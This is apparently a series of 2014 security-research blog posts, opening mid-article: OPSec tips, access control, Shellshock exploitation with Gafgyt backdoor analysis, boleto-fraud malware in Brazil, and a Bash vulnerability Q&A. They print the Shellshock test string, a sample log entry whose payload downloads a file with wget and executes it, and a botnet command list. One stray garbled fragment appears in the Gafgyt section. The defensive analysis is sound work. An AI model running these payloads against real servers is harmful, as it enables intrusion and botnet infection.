The second golden rule is that OPSec does not work retrospectively, so we should very careful about what we are doing now if we don't want it to come back and bite us in the future.

In terms of OPSec, every security analyst should aspire to being just another guy in the line. If we attract too much attention to ourselves, surveillance could easily escalate beyond electronic means – and that is basically game over. In today's world of massive surveillance, standing out will alert the attention of anyone who can access the relevant data. And in today's world of information leakage and "big internet companies", it´s difficult to know exactly who has access to which data:

(example of data leaked from an aggregator and published as a service)

There are some interesting examples of how anomalies have been detected from metadata and then successfully used in investigations (http://en.wikipedia.org/wiki/Abu_Omar_case). And then there is the routine application of this in mass surveillance and data mining.

So what can we do?

The first rule of implementing OPSec is don´t try to accomplish more than you can. The fact is bad OPSec might be worse than no OPSec at all.

The main feature needed for effective OPSEC is not technical, but psychological: be meticulous, and maintain a healthy level of paranoia.

However electronic surveillance is obviously much more common and every bit of information will be there forever. Let´s look at our minimum toolset to avoid leaking information and thin about some basic tips.

Encryption

Obviously we should use as much encryption as possible. But remember that there is an inherent weakness. Once your keys are compromised, all the info that was encrypted in the past is compromised with them. As time passes, the likelihood of your keys being compromised will grow. So it's much better to use IM with OTP.

Today's big question: what is happening with TrueCrypt, the most popular encryption software?

According to the Audit project, there is no obvious flaw or backdoor. However a couple of months ago we saw this:

There are still many open questions, but you can find a trusted TrueCrypt repository at: https://github.com/AuditProject/truecrypt-verified-mirror

Email

Email simply leaves too much metadata, even when the message is encrypted with PGP (by the way, use keys bigger than 2048). IM with OTP is better.

External providers cannot be trusted.

IM

Pidgin and Adium seem to be ok. But remember not to log your chats and don't overlook the non-technical factor: you don´t know who is on the other side of the conversation (even when you have verified the key).

TOR

I'd definitely recommend using an anonymizing network to shake off most of the groups that could track you. However it cannot be considered truly "secure" in the sense that most of output nodes are controlled by people that can correlate their logs with the source of the connection. We saw an example of this in the Harvard bomb:

http://www.theverge.com/2013/12/18/5224130/fbi-agents-tracked-harvard-bomb-threats-across-tor

Also TOR has been the target of many attack attempts, like this recent one:

So don´t blindly trust TOR for anything very sensitive, but use it for your daily activities. Never reveal your true IP.

Telephone

A total nightmare in terms of OPSec. The simple recommendation is to get rid of it! But this won't happen.

At least don´t do anything sensitive with it, instead use burner phones, and don´t use them at  home or work.

Conclusions

Perfect OPSec is almost impossible. However implementing basic OPSec practices should become second nature for every researcher. Once you internalize the need to apply OPSec you will be more careful and hopefully, avoid rookie mistakes like talking too much and bragging about your research.

The most important things, beyond any tool, are being meticulous, applying the right level of OPSec according to your situation and understanding what you can actually hope to achieve.

This is just a brief introduction to a complex topic, but we hope it could be a useful eye-opener, especially for our fellow security researchers.

Breaches in corporate network protection: access control

Tue, 09/30/2014 - 09:43

In almost any company the IT security department faces two priority tasks: ensuring that critical systems operate continuously and reducing the risk of attacks on the corporate network. One of the most effective approaches to both these problems is to restrict the privileges of system users.

In terms of IT security, critical systems have two basic properties - integrity and availability - that affect their operational continuity. To protect a corporate network from attacks it is necessary to reduce the attack surface by reducing the number of devices and network services available from outside the corporate network and by protecting the systems and services that require such access (web services, gateways, routers, workstations, etc.). The main vector of attack on a corporate network is the user computers connected to the Internet on that network.

Theoretically, to protect critical systems from unauthorized changes and reduce the possibility of attacks on the corporate network, you should:

  • specify those objects (equipment, systems, business applications, valuable documents, etc.) on the corporate network  that require protection;
  • describe the company's business processes and use those to help determine the levels of access to the protected objects;
  • ensure that each subject (a user or a corporate application) has a unique account;
  • limit subjects' access to objects, i.e. to restrict the rights of the subjects within the business processes;
  • ensure that all operations between the subjects and the objects are logged and the logs are stored in a safe place.

In practice, it works more like this:

  • All corporate documents are stored centrally in shared folders on one of the servers of the company (for example, on the Document Controller server)
  • access to critical systems is denied to everybody but administrators - any administrator - can log into the system remotely to quickly repair any failure
  • Sometimes administrators use a "shared" account
  • All employees have limited privileges as a 'standard user' but on request anyone can get local administrator rights.

Technically, it is much easier to protect critical systems than workstations: changes in business processes are rare, regulations vary little and can be drawn up to account for even the smallest details. By contrast the users' work environment is chaotic, their processes change rapidly and the protection requirements change along with them. In addition, many users are suspicious of any restrictions, even when there is no impact on workflow. Therefore, the traditional protection of users is based on the principle 'it is better to miss malicious software than to block something really important'.

Last year, Avecto conducted a study called "2013 Microsoft Vulnerabilities Study: Mitigating Risk by Removing User Privileges" and concluded that "by removing local administrator rights it is possible to reduce the risk of exploitation of 92% of critical vulnerabilities in Microsoft software". The conclusion seems logical but it should be noted that Avecto did not test vulnerabilities; it only analyzed data from the Microsoft Vulnerability Bulletin 2013. Nevertheless, it is clear that malicious software running without administrator rights cannot install a driver, create/modify files in protected directories (% systemdrive%,% windir%,% programfiles%, etc.), change system configurations (including writing to the HKLM registry hive) and most importantly - cannot use privileged API functions.

In reality, though, the lack of administrator rights is not a serious obstacle for either malicious software or a hacker penetrating into the corporate network. Firstly, any system has dozens of vulnerabilities that open up the necessary rights up to kernel level privileges. Secondly, there are threats which only require standard user privileges to be implemented. The diagram below shows possible attack vectors that do not require any administrator rights. Let's have a closer look at them.

Local attacks

With only standard user privileges, the attacker gets full access to the memory of all processes running under the user account. This is enough to integrate malicious code into processes in order to remotely control the system (backdoor), to intercept keystrokes (keylogger), to modify the content in the browser, etc.

Since most antivirus programs can control attempts to implement unknown code in the processes, attackers often use more secretive methods. Thus, an alternative method applied to implement a backdoor or a keylogger in the browser process is to use plugins and extensions. Standard user privileges are enough to download a plugin, and that code can do almost everything a fully-featured Trojan is capable of. That includes remotely controlling the web browser, logging data entries in browser traffic, interacting with web services and modifying page content (phishing).

Fraudsters are also interested in standard office applications (such as email and IM-clients) which can be used to attack other network users (including phishing and social engineering). Scammers can access programs like Outlook, The Bat, Lync, Skype, etc. via API and local services of such applications as well as by injecting code into the relevant processes.

Of course it's not just applications that are of value to fraudsters; the data stored on the PC is also a potential goldmine. In addition to corporate documents, attackers often look for different application files containing passwords, encrypted data, digital keys (SSH, PGP), etc. If the user's computer has the source code, attackers could try to implement their code into it.

Domain attacks

Since the accounts of most corporate users are domain accounts, the domain authentication mechanisms (Windows Authentication) provide the user with access to various network services on a corporate network. This access is often provided automatically without any additional verification of the username and password. As a result, if the infected user has access to the corporate database, attackers can easily take advantage of it.

Domain authorization also allows attackers to access all network folders and disks available to the user, share internal resources via the intranet and sometimes evenaccess other workstations on the same network segment.

In addition to network folders and databases, the corporate network often includes various network services such as remote access, FTP, SSH, TFS, GIT, SVN, etc. Even if dedicated non-domain accounts are used to access these services, attackers can easily utilize them while the user is working on his computer (i.e. during an active session).

Protection

It is almost impossible to provide high level of protection for workstations by denying users administrative rights. Installing antivirus software on a workstation will increase its security but won't solve all problems. To achieve high security levels, Application Control technology should consist of three key elements:

  1. Default Deny, which only allows the installation and running of software that has been approved by the administrator. In this case, the administrator does not have to put each individual application (hash) on the list of trusted software. There is a wide variety of generic tools available to enable dynamic whitelisting of all software signed by an approved certificate, created by an approved developer, obtained from a trusted source or contained in the Whitelisting database of a security software provider.
  2. Application Control that can restrict the work of trusted applications according to their functions. For example, for normal operation the browser should be able to create network connections but it does not need to read/write other processes in the memory, connect to online databases or store files on the network.
  3. Update management that ensures all software on workstations is updated promptly, reducing the risk of infection via update mechanisms.

In addition, specific products which feature Application Control can provide a range of useful functions based on this technology: inventory, control over software installed on the network, event logs (which will be useful in the case of incident investigation), etc.

On the one hand, the combination of technologies can provide users with everything they need for work and even for entertainment and is flexible enough to deal with changing requirements. On the other hand, the chances of an attacker gaining access to the protected system are extremely limited. No doubt, this is the best balance between flexibility and security in protecting a corporate network.

Shellshock and its early adopters

Fri, 09/26/2014 - 06:27

Shortly after disclosure of the Bash bug called "Shellshock" we saw the first attempts by criminals to take advantage of this widespread vulnerability also known as CVE-2014-6271.

The most recent attempts we see to gain control of webservers just create a new instance of bash and redirect it to a remote server listening on a specific TCP port. This is also known as a reverse-connect-shell. Here's an example of how this attack appears in a webserver logfile:

The attacker listens on IP address 195.xx.xx.101 on TCP port 3333, while the attack's origin is the IP address 94.xx.xx.131. To gain control of a server with this method, no external binaries are involved.

In another ongoing attack the criminals are using a specially crafted HTTP-request to exploit the Bash vulnerability in order to install a Linux-backdoor on the victim's server. We're detecting the malware and its variants as Backdoor.Linux.Gafgyt.

The binary contains two hardcoded IP addresses. The first one is only used to notify the criminals about a new succesful infection. The second IP address is used as a command-and-control server (C&C) to communicate directly with the malware running on the infected webserver.

The following picture shows an example on how this communication can look like:

In line 1 the malware sends a "Hello" message and tells the attacker which architecture the binary was compiled for – here it's x86.

Independently of commands sent by the attackers, the backdoor sends a "PING" request every 30 seconds, which is answered with a "PONG" from the server (for better readability we've removed REMOVED is much better (S.O.) --> some of PING/PONG-pairs from the example above).

Commands always start with "!* ". The first command we see in this example is the "SCANNER ON" command in line 10. This tells the binary to scan random IP ranges for hosts accepting telnet connections on TCP port 23. When such a host is found, it tries to login using a hardcoded list of common default user/password combinations.

There is also a rudimentary honeypot fingerprinting routine implemented, which makes use of "busybox" as described by the Internet Storm Center here.

The next task the criminals start on the victim's box is initiated in line 14. Here the binary is told to perform flooding of IP 69.xx.xx.67 using UDP for 50 seconds. In line 17 the attackers stop the flooding in order to restart it in line 18, now targeting 178.x.x.241. The "None Killed." reply in line 21 appears because the flooding instruction from line 14 was already finished when the attacker tried to stop it using "!* KILLATTK" in line 17.

Here's the complete list of commands the backdoor accepts:

!* PING – Replies with "PONG!"
!* SH - Execute arbitrary shell command
!* GETLOCALIP – Replies with "My IP: $ipaddr"
!* SCANNER ON | OFF - Scan random networks, perform a very small dictionary attack (see above), test if target is a honeypot

!* HOLD - Hold flooding
!* JUNK – Perform junk flood
!* UDP – Perform udp flood
!* TCP – Perform tcp flood
!* KILLATTK - Kill all flood
!* LOLNOGTFO – Terminate backdoor.

Related binaries:

73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489
2d3e0be24ef668b85ed48e81ebb50dce50612fb8dce96879f80306701bc41614
ae3b4f296957ee0a208003569647f04e585775be1f3992921af996b320cf520b

 

0fde4c72038189e3d86676d84a1370787bcd284f98d1dff7736707fe05af7d9a
3b13eef9b24919dc7e7071068a83defcc4808a41dc86fadf039e08dce1107f7d
64b3751182be737c005fb04ffbe8b4dfe5930ed46066e87a9f6344de1d9985b8

 

Attacks against Boletos

Fri, 09/26/2014 - 03:00
Introduction

José is a very suspicious person. He never uses internet banking services or buys anything using a credit card. Indeed, he doesn't even have one. He doesn't trust any of these modern technologies in the slightest. He's well aware of all the risks that exist online, so José prefers to keep his life offline.  However, not even that could save him from today's cybercriminals. He lost more than $2,000 in a single day: José was p0wned by a barcode and a piece of paper.

Brazilian crooks created a unique way of stealing money from these cautious, offline-only types: changing "boletos", popular banking documents issued by banks and all kind of businesses in Brazil. Boletos are actually one of the most popular ways to pay bills and buy goods in Brazil – even government institutions use them – and they are a unique feature of the Brazilian market.

In a series of online attacks targeting flaws on network devices – especially DSL modems – and involving malicious DNS servers, fake documents, browser code injections in the style of SpyEye, malicious browser extensions and a lot of creativity, the crooks have successfully stolen vast amounts of money, even from people who don't have credit cards or Internet banking accounts. It's a new worry for banks and financial institutions in the country.

This article explains how these attacks have happened in Brazil, and gives advice on protecting customers even when they have chosen to live offline.

Boleto bancário: the Brazilian payment system

Boletos are a very popular and easy way to pay bills or buy goods in Brazil today; even online stores will accept this kind of payment. All you need to do is print and pay it. According to the Brazilian Central Bank 21% of all payments in the country in 2011 were made using boletos.

Preferred payment methods in Brazil in 2011

According to e-bit 18% of all e-commerce transactions in Brazil in 2012 used boletos as the preferred payment method:

Preferred online payment method in Brazil in 2012

A boleto comes with an expiry date. Before that date it can be paid in at ATMs, branches and internet banking of any Bank, the Post Office, Lottery Agents and some supermarkets until its due date.  After the date it can only be paid at a branch of the issuing bank. The client also pays a fee levied by the bank; the fee increases with every passing day. Banks charge a handling fee for every boleto paid in by a customer. This fee varies from BRL 1,00 to BRL 12,00, depending on the bank. If the collection is registered then the bank will also charge a fee for every issued boleto, regardless of whether it was paid or not. Therefore, unregistered collections are more suitable for online transactions.

The bank also takes into account the size of the client, so a client with a higher volume of banking transactions, who has been working with the bank for a while, etc, is able to get lower fees or even fee exemption, which made the boleto a very important sales tool inside big companies, e-commerce and the government. If a company want to do business in Brazil, it essential to use boletos – Apple, Dell, Skype, Microsoft, DX.com, Alibaba.com, and even FIFA in the 2014 World Cup used it in local operations.

Buying Skype credits with boleto bancário as a payment method

This is the basic structure of a printed boleto bancário:

Boleto bancário for beginners according TheBrazilBusiness.com

  • Issuer Bank: the financial institution responsible for issuing and collection based on an agreement between itself and the merchant. The bank, once authorized to collect payment for the merchant, will credit the amount owed by the client in the merchant's bank account.
  • Identification Field: a numerical representation of the barcode, it contains all the information necessary to identify the merchant's bank account and clear the payment. This field is used in home and self-service banking.
  • Barcode: a code consisting of a group of printed and variously patterned bars (always 103mm in length and 13mm in height) and spaces and sometimes numerals that is designed to be scanned and read by a digital laser scanner and that contains information to identify the object it labels.

To pay a boleto at the bank or online all that is necessary is to scan the barcode – if it's unreadable (due to a bad print) users can type in the 44-number identification code instead. Some banks have a barcode scanner in their mobile apps, so mbanking users don't need to type the ID field; they can pay the boleto using their device's camera.

Paying a boleto using a barcode scanner

What could possibly go wrong? Well, how about changing the barcode or the ID field? It's simple and means payments can be redirected to another account. That's exactly what Brazilian fraudsters started to do – and the easiest and effective way was using malware.

The Brazilian boleto malware

A boleto can be generated and printed by the store that is selling its products to you, or even by users themselves during an online purchasing process. It's displayed in the browser, generally in HTML mode, using free libraries available for developers to implement in their ERP software or in their online store system.

BoletoPHP is a free resource for developers to generate boletos using PHP

The extensive documentation and legitimate open source software used to generate boletos helps malware creators to develop Trojans which are programmed to change boletos locally, as soon as they are generated by the computer or browser. These Trojans were spotted in the wild in April 2013 by LinhaDefensiva.com and are still being distributed in Brazil today. In fact most of the Brazilian criminals who use Trojan bankers to steal money are migrating their attacks to target boletos, using the same infrastructure.

The first generations chose to change the ID field number and the barcode:

A boleto modified by a Brazilian Trojan: the new ID number and barcode redirect the payment to the fraudster's account

Some versions of the malware use a JavaScript injection to change the content of the boleto:

"CodBarras" means barcode in Portuguese

Some later versions of this Trojan appeared and started to change only the numbers in the ID field:

"Linha Digitável" means typeable line in Portuguese; it's the ID field number

These new versions also used a span HTML element in order to add a white space to the barcode, making it unreadable. That forces the customer or bank staff to type the doctored 44-digit ID field to pay the boleto. So as not to raise suspicions, the Trojan does not change the value and due date for the transaction:

HTML page changed by the Trojan, adding a white space to invalidate the barcode, source LinhaDefensiva.org

The ID field includes a lot of information, detailing the bank account that will receive the payment and other data used according to the rules established by each bank. The "Nosso Número" data ("Our ID Number") is a unique identifier, different for each boleto. Changing the ID number is enough to redirect the payment to another bank account.

Understanding the ID field on boletos

Since most boletos are now generated in a browser, the Trojan targeting Internet Explorer users installs a BHO ready to communicate with a C&C and monitor traffic, looking for words such as "boleto" and "pagamento" (payment), choosing the right moment to inject the code and replacing the ID number stored in HTML with a new one, downloaded from the C&C.

It's like SpyEye: code injection in the browser's section

Initially most of these BHO had a very low detection rate, incorrectly flagged as Trojan banker by normal antimalware products (e.g the MD5s 23d418f0c23dc877df3f08f26f255bb5 and f089bf60aac48e24cd019edb4360d30d). One example of a request made by these BHOs and a response with a new ID number to be injected:

Request: http://141.105.65.5/11111.11111%2011111.111111%2011111.111111%201%201111111111
Response: 03399.62086 86000.000009 00008.601049 7 00000000000000

Compromised websites may also host scripts that generate the new ID number for these boletos:

Or something design to inject not only a new ID number but a new barcode as well:

We also found very professional control panels used by the fraudsters to collect data from infected machines and register every boleto as soon as it is generated. It's the same infrastructure used in the development of Trojan bankers, as a fraudulent boleto is a new way to steal money from the users.

A bad guy's control panel to control infected machines

Some of the panels offer a lot of details to the crooks, such as the date/hour the boleto was generated/changed, the old ID field and the replacement injected by the malware, the value and the origin – where the boleto was generated, if it was local or on a website.

Another boleto malware panel

Right now it's really easy to find places where wannabe cybercriminals can buy this toolkit and start their own attacks on boletos. A starter pack costs about R$ 500.00 (around US$ 250)

"Only for connoisseurs", the boleto kit malware + panel for sale on Facebook

The Zeus link – encrypted payloads

The boleto malware campaigns combined several new tricks to infect and steal from more users. One of the most recent is the use of non-executable and encrypted malware payloads XORed with a 32-bit key and compressed by ZLIB, using the extensions .BCK, .JMP, .MOD and others.

Encrypted .JMP file downloaded by the boleto malware

It's no coincidence that the same technique was used by the ZeuS GameOver gang. We have evidence of Brazilian criminals cooperating with western European gangs involved with ZeuS and its variants; it's not unusual to find them on underground forums looking for samples, buying new crimeware and ATM/PoS malware. The first results of this cooperation can be seen in the development of new attacks such the one targeting payments of boletos in Brazil.

Using encrypted payloads offers the criminals an effective way to bypass any firewalls, webfilters, network intrusion detection systems or other defenses that may be in place, as a tiny Trojan downloads these encrypted files and decrypts them to complete the infection.

Decrypted .JMP file: a normal PE executable

Intercepting SSL conections

Another interesting approach seen in boleto malware is the role of Fiddler, a web debugging proxy tool normally used by malware researchers. Some boleto malware uses it to intercept SSL traffic or to do a MitM, aiming to change boletos generated even in HTTPS pages.

We found this behavior in samples such as Trojan.Win32.Badur.imwt:

Boleto Trojan programmed to use Fiddler: MitM in SSL pages

The malware installs SSL certs from FiddlerCore on the infected machine and captures the traffic of HTTPS pages.

Certificate of Fiddler installed by the malware

Attacks against network devices

Investigating the attack vector used by the fraudsters and looking at how the victims got infected we found that all possible techniques are used. Social engineering attacks via well designed e-mail campaigns are the most widespread, but the most aggressive path includes the massive use of RCE on vulnerable DSL modems – in 2011/12 more than 4 million of these devices were attacked in Brazil and had their DNS settings changed by cybercriminals – the same approach is still being used to distribute this malware today.

When an affected user tries to visit popular websites or Brazilian web portals the malicious DNS configured in the DSL modem offers to install a new Flash Player. In reality, accepting this installation will infect the machine with boleto malware.

Is Google.com hosting a Flash Player installer? Nope, it's the malicious DNS in the DSL modem

Another recent move from Brazilian criminals was to spread web-based attacks against home-routers in an attempt to change the DNS of the device. These attacks were called "drive-by-pharming". It can be spread via malicious domains or by compromising popular websites:

News website "Estadão" compromised: the malicious script asks the password of your home router

The malicious script tries to guess the password of your home router. If it succeeds a new DNS server will be configured in the device and the criminals will control all your traffic. If it fails the compromised site will display a box asking for your credentials.

Is the password of your router gvt12345? Just guessing…

Recently we identified more than 30 malicious DNS servers being used in these attacks in Brazil. What does the new DNS server do? It redirects users' connections, serving phishing pages or even fake banking pages that modify every boleto the user generates.

If criminals combine web-based attacks with advertisements they can reach millions of people. This tactic is already being used:

What's the fastest way to attack home routers in Brazil? Using advertising

If the criminals can't compromise your network device, they'll target the ISP. We have already seen a series of DNS poisoning attacks against Net Virtua, one of the biggest Brazilian ISPs. Every time the aim is the same, targeting boletos.

But there was worse to come when cybercriminals decided to move to a more online approach…

Fake websites, fake extensions, fraudulent boletos

Some fraudsters decided that spreading their Trojans wasn't enough. They wanted faster returns and changed their tactics. They looked online, investing in sponsored links, fake websites that claimed to recalculate expired boletos (this is possible with this payment system) and malicious browser extensions for Google Chrome or Firefox.

Malicious Chrome extensions, in the official Store

One attack started with a message promising 100 minutes free Skype credit:

Skype-To-Go free for Chrome users! It's easy, just install an extension…

Why distribute a Trojan when you can trick users into installing a malicious browser extension that controls and monitors all the traffic? That's exactly what the fraudsters did, with the valuable help of the official Google Chrome Web Store, where the malicious extension was hosted:

Trojan-Banker.JS.Banker.bv

And this wasn't the only one, we found more:

Trojan-Banker.JS.BanExt.a, found on June 2014 in the Store, almost 2,000 users installed it

And one more, disguised as financial app that generates (fake) boletos:

Trojan-Banker.JS.Banker.bx, more than 3,800 installations…

The extension was prepared to just like a BHO on an infected machine: monitor and wait for the moment a boleto is generated, and then communicate with a C&C…

Trojan-Banker.JS.Banker.bw

…and receive a new ID field number, injecting it in the boleto while invalidating the barcode:

To disguise any intent to discover the real purpose of the extension there was some obfuscation of the main .JS file inside the .CRX file:

HEXed JavaScript file

After removing the obfuscation we can see the websites it's targeting:

The list includes big Brazilian backs and well-known online stores such as Americanas.com and PagSeguro (a service similar to Paypal). Customers of small banks did not escape from the attack – malicious extensions are set up to target a long list of local banks:

The huge number of malicious extensions prompted Google's decision at the end of May 2014 to limit the installation of Chrome extensions. Now they can only be hosted on the Chrome Web Store, but it is no problem for cybercriminals to put their malicious creations there.

Forcing the developer mode on Google Chrome

One example is Trojan-Banker.Win32.ClearWind.a. Its main target is to install a malicious extension that changes boletos, activating the developer mode on Google Chrome and forcing the installation of any extension, even those not hosted in the official store:

"Developer mode" activated on Chrome. The malware did it

These Trojans were able to infect a lot of people, installing the malicious extension to change boletos:

Trojan-Banker.Win32.ClearWind.a, more than 8,000 installations

Malicious Firefox add-on

But if you use Firefox, you're still at risk; there is a version of a malicious add-on for these users as well:

For bad guys' convenience, the malicious Firefox add-on is hosted on Google Storage:

Trojan-Banker.JS.Banker.cd ready to install a malicious addon to change your boletos

Sponsored links, fake websites

Other interesting characteristic of boletos is that you can generate a counterpart copy, in case you lose the original one. Some banks also offer a service to customers who missed the payment deadline and need to recalculate the value of an expired boleto and reissue it, after paying a small fee. All companies working with boletos offer these services to their customers, generally online, and cybercriminals can attack here as well.

The fraudsters decided to set up malicious websites that claim to offer re-issues or recalculations of expired boletos – but of course the new boleto is totally fake and redirects the payment to the criminals' account. These attacks are carried out with the help of search engines, buying up sponsored link campaigns and putting their fraudulent sites to the top of the results.

In a search for "calcular boleto vencido" (recalculate expired boleto) or "segunda via boleto" (counterpart copy) on Google, the first result is a fraudulent service:

Google isn't the only one – it's the same on Yahoo:

And Ask.com:

Not forgetting Bing:

The fake websites that supposedly offer these services have a very professional design to help trick their victims.

All you need to do is choose the bank that issued the boleto, type in the data and "reissue" it.

Of course the boleto generated has the exact same value and due date you asked for, but the ID field number has new data…

"Your new boleto was generated and registered. Pay it today"

It's not just malware: the boleto gangs are using all the possible ways of tricking users and stealing their money. A very widespread attack such this one resulted in many victims.

Online and offline victims

These attacks were especially notorious for their "crossover" to the offline world, stealing from people who do not use internet banking or buy things online. It can even steal from people who have never connected to the Internet in their lives. Several infected computers in thousands of stores all over the country started to generate fraudulent boletos for their customers. Once printed and paid they sent the money directly to the cybercriminals' accounts.

This sparked a real avalanche of Trojans using the same technique, and several businesses were badly affected. Many companies, the association of shopkeepers and the Brazilian government all issued alerts to their customers about the fraudulent boletos issued by these trojans (e.g. 1, 2, 3, 4). A lot of money was stolen and even now this fraud is costing banks, stores and customers dear.

Some cases draw our attention such this one of a businesswoman from Campo Grande – her company lost BRL 183,000 (around US$80,000):

That sum was stolen in just 3 days…

The Police Department in the state of Minas Gerais issued an alert to residents, warning that fraudsters had already stolen around BRL 25,000 (US$ 10,000) from businesses:

The police registered 12 cases in the state

To measure the problem we did the sinkhole of a C&C and found several victims – in only one malicious server the logs registered more than 612,000 requests in 3 days. Each one sought a fraudulent ID field to be injected into boletos generated on the infected machines:

Requests to a sinkholed C&C

Looking at these values led us to ask: how much money was stolen? How many victims? It's not easy to get this number if you do not thoroughly understand the Brazilian cybercrime environment.

8 billion?

In July 2014 several media outlets covered some RSA research about a "Cybercrime Scheme Uncovered in Brazil" – those attacks against boletos. Right from the start it offers a shocking figure: possibly as much as US$3.75 billion stolen, BRL 8.6 billion. In other words, it would have been the largest cybercrime heist known to date. To compare how big this number is, Banco do Brasil, the biggest bank in the country, makes US$ 6.6 billion in annual profits. So the bad guys stole half of the money from a big bank? Not so fast…

RSA found 495,793 boletos and 192,227 victims in their investigation. Once inside the control panel, they found the values of all payments that the virus had redirected. Added together, those payments topped the US$3.75 billion mark. This figure, however, includes everything – payments not made and payments that were made but not authorized by the bank (as the fraud was detected).  It also includes any test payments made by other researchers trying to understand the malware behavior or even tests made by the bad guy, or even duplicated entries as some customers tried to generate the same boleto several times.

A C&C displaying testing and duplicated entries

Counting every entry in a C&C resulted in this absurd number of R$ 8 billion, which averages at R$ 16,000 for each boleto. This value is unreal and incorrect — most boletos are worth far less. They also estimated a number of victims at 192,227. They did this by counting unique IP address, which is very unreliable. As in other parts of the world, most connections in Brazil use dynamic IP addresses. Other errors in the RSA report were highlighted by the LinhaDefensiva community in this article.

So how much was really stolen with fraudulent boletos? In reality only the banks can suggest a final total. The Brazilian Federation of Banks (FEBRABAN) publishes the combined losses faced by all banks due to electronic fraud each year. The year with the most losses so far was 2011. That year, they lost R$ 1.5 billion, or US$ 680 million.

One thing is certain: Brazilian cybercriminals are moving fast, adopting new techniques to continue attacking and stealing money from boletos. They would not waste their time if the scam was not profitable for them.

How to protect you and your company

This is a common question from users and businesses in Brazil working with boletos. Is it possible using this payment method securely?

FEBRABAN, the Brazilian Federation of Banks, suggests using DDA (Debito Direto Autorizado, Authorized Direct Debit). This replaces a printed boleto with an electronic bill, automatically withdrawing funds from another person's bank account after both parties pre-authorize the deal.

However some Brazilian companies are concerned by the higher costs associated with DDA. In this case we advise issuing boletos in a PDF format generated on the server-side, instead of using HTML format. At present no Trojan can modify a PDF boleto.

Boleto generated in PDF format: more secure than HTML

Kaspersky Lab customers are protected against these attacks – the Safe Money technology presented in our products can block it entirely by offering the option of opening pages in a safe mode where no malicious code could inject data. This ensures that boletos can be generated securely:

Kaspersky Fraud Prevention platform also stops Trojans designed to capture HTTPS traffic using Fiddler. KFP compares this fake certificate of Fiddler with the real certificate used by the Bank or payment service and then blocks access.

Kaspersky Fraud Prevention in action, blocking an unreliable SSL connection

Conclusions

Today these attacks are a big headache for everyone involved in buying and selling in Brazil – banks, businesses and customers alike. When a customer is hit with a fake boleto he says it's not his fault because he paid. The stores blame the bank for failing to process the payment properly. The bank insists it is only responsible for processing the boleto, not for the content of the paperwork. The buck goes round and round …

To complete the scenario Brazilian criminals specialize in identity theft. They often open banking accounts in the name of innocent people who know nothing of the situation, using stolen personal data. With money mules and accounts opened in the name of dead people; it's easy to see why it's so difficult to track stolen money.

Boletos are a very local and distinctive payment method; most other countries don't have anything similar and don't even know what a boleto is. Unfortunately security companies pay little attention to Brazil and miss a lot of issues that only local intelligence can detect and offer expertise. Local criminals are strictly limiting their attacks to Brazilian IPs and only install their Trojans on machines operating in Brazilian Portuguese.

Brazilian cybercriminals are following the same path as their counterparts in Russia and China, with a very specialized cybercrime scene where attacks on locals require special effort to understand properly. They are also sharing knowledge with cybercriminals from Eastern Europe, exporting new techniques such this one described here, clearly inspired by SpyEye, to do code injection.

"Bash" (CVE-2014-6271) vulnerability – Q&A

Thu, 09/25/2014 - 10:45
What is the "bash" vulnerability?

The "bash" vulnerability, actually described as CVE-2014-6271, is an extremely powerful vulnerability due to its high impact and the ease with which it can be exploited. An attacker can simply execute system level commands, with the same privileges as the affected services.

In most of the examples on the Internet right now, attackers are remotely attacking web servers hosting CGI scripts that have been written in bash or pass values to shell scripts.

At the time of writing, the vulnerability has already been used for malicious intentions – infecting vulnerable web servers with malware, and also in hacker attacks. Our researchers are constantly gathering new samples and indications of infections based on this vulnerability; and more information about this malware will be published soon.

The key thing to understand is that the vulnerability is not bound to a specific service, for example Apache or nginx. Rather, the vulnerability lies in the bash shell interpreter and allows an attacker to append system level commands to the bash environment variables.

How does it work?

I will use the same examples that we have seen in the advisories and proof-of-concept code that have been published,to explain how it works. When you have a CGI script on a web server, this script automatically reads certain environment variables, for example your IP address, your browser version, and information about the local system.

But just imagine that you could not only pass this normal system information to the CGI script, but could also tell the script to execute system level commands. This would mean that – without having any credentials to the webserver – as soon as you access the CGI script it would read your environment variables; and if these environment variables contain the exploit string, the script would also execute the command that you have specified.

What makes it unique?

This vulnerability is unique, because it's extremely easy to exploit and the impact is incredibly severe – not least because of the amount of vulnerable targets. This does not just affect web servers, it affects any software which uses the bash interpreter and reads data which you can control.

Researchers are also trying to figure out if other interpreters, such as PHP, JSP, Python or Perl, are also affected.  Ddepending on how code is written, sometimes an interpreter actually uses bash to execute certain functions; and if this is the case, it might be that other interpreters could also be used to exploit the CVE-2014-6271 vulnerability.

The impact is incredibly high because there are a lot of embedded devices that use CGI scripts – for example routers, home appliances and wireless access points.  They are also vulnerable and, in many cases, difficult to patch.

How widespread is it?

This is very difficult to say, but we know from our intelligence systems that people started to develop exploits and worms directly after the vulnerability information was published – both whitehat and blackhat researchers are scanning the Internet for vulnerable servers.

It is too early to know how widespread this is, but I know from my own research that there are a great many web servers running CGI scripts, and I am pretty sure that we will also see a lot of other types of exploits being developed that target local files and network daemons. There have been discussions regarding both OpenSSH and dhcp-clients being vulnerable to this attack as well.

How do I check if my system/web site has been affected?

The easiest way to check if your system is vulnerable is to open a bash-shell on your system and execute the following command:

"env x='() { :;}; echo vulnerable' bash -c "echo this is a test"


If the shell returns the string "vulnerable", you should update your system.

Also there are tools for the technical audience out there that can be used to verify if your server is affected by this vulnerability.

Advice on how to fix this problem

The first thing that you need to do is to update your bash version.  Different Linux distributions are offering patches for this vulnerability; and although not all patches have been proven to be completely effective, patching is the first thing to do. Services like Heroku pushed out fixes that will auto-apply within 24 hours, but developers can force the updates too.

If you are using any IDS/IPS I would also recommend that you add/load a signature for this. A lot of public rules have been published.

Also review your webserver configuration.  If there are any CGI scripts that you are not using, consider disabling them

Is there threat to online banking?

This vulnerability is being actively exploited to target servers hosted on the Internet. Even some workstations running Linux and OSX are vulnerable, but an attacker would still need to find an attack vector that will work remotely against your desktop. Proof of concept targeting *nix workstation dhcp clients has been released, but most workstation dhcp process policies prevent actions from this sort of exploit by default.

Exploit attempts that we observed are targeting server vulnerabilities and downloading DDoS bots for further DDoS attacks. It is likely that servers hosting PII and handling sensitive merchant data are being attacked as well, but we have not yet observed it. There are merchants that unfortunately do not patch quickly.

Can I detect if someone has exploited this against me?

We would recommend reviewing your HTTP logs and check if there is anything suspicious. An example of a malicious pattern:

192.168.1.1 - - [25/Sep/2014:14:00:00 +0000] "GET / HTTP/1.0" 400 349 "() { :; }; wget -O /tmp/besh http://192.168.1.1/filename; chmod 777 /tmp/besh; /tmp/besh;"


